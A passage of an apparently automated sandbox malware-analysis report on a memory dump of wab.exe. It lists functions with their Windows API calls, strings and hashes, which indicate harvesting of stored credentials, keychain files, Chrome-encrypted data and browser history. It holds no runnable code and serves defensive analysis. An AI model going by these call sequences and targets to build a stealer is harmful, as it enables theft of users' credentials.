                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                • API String ID: 2745753283-3798722523
                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                • CopyFileW.KERNELBASE(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                • memcpy.MSVCRT ref: 0040BB66
                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                • String ID: chp$v10
                                                                                                                • API String ID: 170802307-2783969131
                                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                • String ID: bhv
                                                                                                                • API String ID: 327780389-2689659898
                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 653 4467ac-4467b7 __setusermatherr 644->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->654 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->644 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 669 446853-446864 GetStartupInfoW 662->669 670 44684d-446851 662->670 663->661 664->660 664->665 665->662 667 446840-446842 665->667 667->662 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                • String ID: visited:
                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                • API String ID: 3883404497-2982631422
                                                                                                                • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 509814883-3916222277
                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError ??3@YAXPAX@Z 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 ??3@YAXPAX@Z 812->819 813->812 819->797
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                                                • String ID: |A
                                                                                                                • API String ID: 1407640353-1717621600
                                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
